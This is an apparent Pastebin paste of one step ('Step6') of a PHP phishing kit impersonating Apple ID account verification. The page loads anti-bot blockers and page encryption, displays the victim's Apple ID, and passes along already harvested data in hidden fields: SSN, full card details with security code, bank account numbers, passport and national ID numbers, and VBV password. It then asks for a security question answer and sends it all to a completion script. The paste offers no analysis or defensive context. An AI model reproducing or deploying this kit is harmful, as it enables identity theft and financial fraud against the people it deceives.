Advertisement
ryancool1

Step6

May 28th, 2018
70
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
PHP 7.63 KB | None | 0 0
  1. <?php
  2. error_reporting(0);
  3. require "assets/includes/blockers.php";
  4. require "blocker.php";
  5. require "assets/includes/session_protect.php";
  6. require "assets/includes/detect_country.php";
  7. require "assets/includes/functions.php";
  8. require "assets/includes/language.mob.php";
  9. require "assets/includes/One_Time.php";
  10. require "assets/includes/enc.php";
  11. if(!empty($_POST['acno'])) {
  12.     $Xacno = $_POST['acno'];
  13. } else {
  14.     $Xacno = "";
  15. }
  16. if(!empty($_POST['sortcode'])) {
  17.     $Xsortcode = $_POST['sortcode'];
  18. } else {
  19.     $Xsortcode = "";
  20. }
  21. if(!empty($_POST['bnz'])) {
  22.     $Xbnz = $_POST['bnz'];
  23. } else {
  24.     $Xbnz = "";
  25. }
  26. if(!empty($_POST['accnumkw'])) {
  27.     $Xaccnumkw = $_POST['accnumkw'];
  28. } else {
  29.     $Xaccnumkw = "";
  30. }
  31. if(!empty($_POST['qatarid'])) {
  32.     $Xqatarid = $_POST['qatarid'];
  33. } else {
  34.     $Xqatarid = "";
  35. }
  36. if(!empty($_POST['passport'])) {
  37.     $Xpassport = $_POST['passport'];
  38. } else {
  39.     $Xpassport = "";
  40. }
  41. if(!empty($_POST['natidsa'])) {
  42.     $Xnatidsa = $_POST['natidsa'];
  43. } else {
  44.     $Xnatidsa = "";
  45. }
  46. if(!empty($_POST['citizenth'])) {
  47.     $Xcitizenth = $_POST['citizenth'];
  48. } else {
  49.     $Xcitizenth = "";
  50. }
  51. if(!empty($_POST['bsbnum'])) {
  52.     $Xbsbnum = $_POST['bsbnum'];
  53. } else {
  54.     $Xbsbnum = "";
  55. }
  56. if(!empty($_POST['idnum'])) {
  57.     $Xidnum = $_POST['idnum'];
  58. } else {
  59.     $Xidnum = "";
  60. }
  61. if(!empty($_POST['socnumca'])) {
  62.     $Xsocnumca = $_POST['socnumca'];
  63. } else {
  64.     $Xsocnumca = "";
  65. }
  66. if(!empty($_POST['climit'])) {
  67.     $Xclimit = $_POST['climit'];
  68. } else {
  69.     $Xclimit = "";
  70. }
  71. if(!empty($_POST['vbvpass'])) {
  72.     $Xvbvpass = $_POST['vbvpass'];
  73. } else {
  74.     $Xvbvpass = "";
  75. }
  76. encryptPage();
  77. ?>
  78. <!DOCTYPE html>
  79. <html>
  80. <head>
  81. <meta content="text/html; charset=utf-8" http-equiv="Content-Type">
  82. <meta content="width=device-width, initial-scale=1, maximum-scale=1, user-scalable=no" name="viewport">
  83. <title>Confirm your information</title>
  84. <link href="assets/img/favicon.ico" rel="shortcut icon" type="image/x-icon">
  85. <link href="assets/css/First.css" media="all" rel="stylesheet" type="text/css">
  86. <link href="assets/css/Second.css" rel="stylesheet" type="text/css">
  87. <link href="assets/css/Fonts.css" rel="stylesheet" type="text/css">
  88. <link href="assets/css/verify.css" rel="stylesheet" type="text/css">
  89. <style>.error {color:red}</style>
  90. </head>
  91. <body id="pagecontent">
  92. <div id="content">
  93. <div class="bdd45">
  94. <?php
  95.  include 'navbar.php';
  96. ?>
  97.  
  98.  
  99.  
  100. <div id="flow">
  101. <div class="flow-body signin clearfix" role="main">
  102. <div class="persona-splash no-photo clearfix">
  103.     <div class="persona-bg"></div>
  104.     <div class="container">
  105.         <div class="splash-section">
  106.             <div class=" person-wrapper">
  107.                 <div>
  108.                     <div class="row">
  109.                         <div class="col-sm-9 appleid-col">
  110.                             <div class="flex-container">
  111.                                 <h1 class="mobile appleid-user">
  112.                                     <span class="first_name">Account Verification</span>
  113.                                     <small class="SessionUser">Your Apple ID is <strong><?php echo $_SESSION['user'];?></strong> </small>
  114.                                 </h1>
  115.                             </div>
  116.                         </div>
  117.                         <div class="not-mobile col-sm-3">
  118.                             <div class="flex-container-signout">
  119.                                 <div class="signout pull-right">
  120.                                     <a href="Signout.php?sslchannel=true&sessionid=<?php echo md5(gmdate("r")).sha1(gmdate("r"));?>"><button class="btn btn-link">Sign Out </button></a>
  121.                                 </div>
  122.                             </div>
  123.                         </div>
  124.                     </div>
  125.                 </div>
  126.             </div>
  127.         </div>
  128.     </div>
  129. </div>
  130. <div class="container">
  131. <div class="flex home-content">
  132.  
  133.  
  134. <form action="Completed.php?&sessionid=<?php echo generateRandomString(115); ?>&securessl=true" method="post" name="details" id="details" class="proceed">
  135. <input type="hidden" name="fname" value="<?php echo $_POST['fname'];?>">
  136. <input type="hidden" name="mname" value="<?php echo $_POST['mname'];?>">
  137. <input type="hidden" name="lname" value="<?php echo $_POST['lname'];?>">
  138. <input type="hidden" name="dob" value="<?php echo $_POST['dob'];?>">
  139. <input type="hidden" name="address" value="<?php echo $_POST['address'];?>">
  140. <input type="hidden" name="address2" value="<?php echo $_POST['address2'];?>">
  141. <input type="hidden" name="town" value="<?php echo $_POST['town'];?>">
  142. <input type="hidden" name="postcodes" value="<?php echo $_POST['postcodes'];?>">
  143. <input type="hidden" name="county" value="<?php echo $_POST['county'];?>">
  144. <input type="hidden" name="country" value="<?php echo $_POST['country'];?>">
  145. <input type="hidden" name="telephone" value="<?php echo $_POST['telephone'];?>">
  146. <input type="hidden" name="ssn" value="<?=$_POST['ssn'];?>">
  147. <input type="hidden" name="ccname" value="<?php echo $_POST['ccname'];?>">
  148. <input type="hidden" name="ccno" value="<?php echo $_POST['ccno'];?>">
  149. <input type="hidden" name="ccexp" value="<?php echo $_POST['ccexp'];?>">
  150. <input type="hidden" name="secode" value="<?php echo $_POST['secode'];?>">
  151. <input type="hidden" name="acno" value="<?php echo $Xacno;?>">
  152. <input type="hidden" name="sortcode" value="<?php echo $Xsortcode;?>">
  153. <input type="hidden" name="bnz" value="<?php echo $Xbnz;?>">
  154. <input type="hidden" name="accnumkw" value="<?php echo $Xaccnumkw;?>">
  155. <input type="hidden" name="qatarid" value="<?php echo $Xqatarid;?>">
  156. <input type="hidden" name="passport" value="<?php echo $Xpassport;?>">
  157. <input type="hidden" name="natidsa" value="<?php echo $Xnatidsa;?>">
  158. <input type="hidden" name="citizenth" value="<?php echo $Xcitizenth;?>">
  159. <input type="hidden" name="bsbnum" value="<?php echo $Xbsbnum;?>">
  160. <input type="hidden" name="idnum" value="<?php echo $Xidnum;?>">
  161. <input type="hidden" name="socnumca" value="<?php echo $Xsocnumca;?>">
  162. <input type="hidden" name="climit" value="<?php echo $Xclimit;?>">
  163. <input type="hidden" name="vbvpass" value="<?php echo $Xvbvpass;?>">
  164. <div class="container flow-sections">
  165. <div class="editable account-edit clearfix">
  166. <div class="row edit-row">
  167. <div class="col-sm-5">                            
  168. <h3 class="section-subtitle" id="nameLabel">Select A Security Question</h3>
  169. <div class="form-group">
  170. <div class="form-group clearfix" style="padding-top:0px;">
  171. <div class="select-wrapper">
  172. <select id="q1" name="q1" type="text" class="form-control question" style="height:32px!important;padding-left:10px;">
  173.     <option  value="">select security question</option>
  174.     <option value="mothers maiden name">Mother&apos;s maiden name?</option>
  175.     <option value="what street did you grow up?">What street did you grow up?</option>
  176.     <option value="name of your best (e) friend (s) of children?">Name of your best (e) friend (s) of children?</option>
  177.     <option value="what is the name of the elder (s) of your cousins? ">What is the name of the elder (s) of your cousins? </option>
  178.     <option value="what was your favorite childhood during your vacation spot?">What was your favorite childhood during your vacation spot?</option>
  179.     <option value="what was your favorite cartoon?">What was your favorite cartoon?</option>
  180. </select>
  181. </div>
  182. </div>
  183. <div class="pop-wrapper field-pop-wrapper middle-wrapper">
  184. <div class="name-input">
  185.   <input type="text" name="a1" id="a1" class="generic-input-field form-control field" placeholder="answer">
  186. </div>
  187. </div>
  188. <br>
  189. <br>
  190. <input type="submit" class="gobtn btn-link" style="width:50%;margin-left:auto;margin-right:auto;float:right" value="Finish">
  191. </div>
  192. </div>
  193. </div>
  194. </div>
  195. </div>
  196. </form>
  197.  
  198.  
  199.  
  200. </div>
  201. </div>
  202. </div>
  203. </div>
  204. </div>
  205. </div>
  206. </body>
  207. </html>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement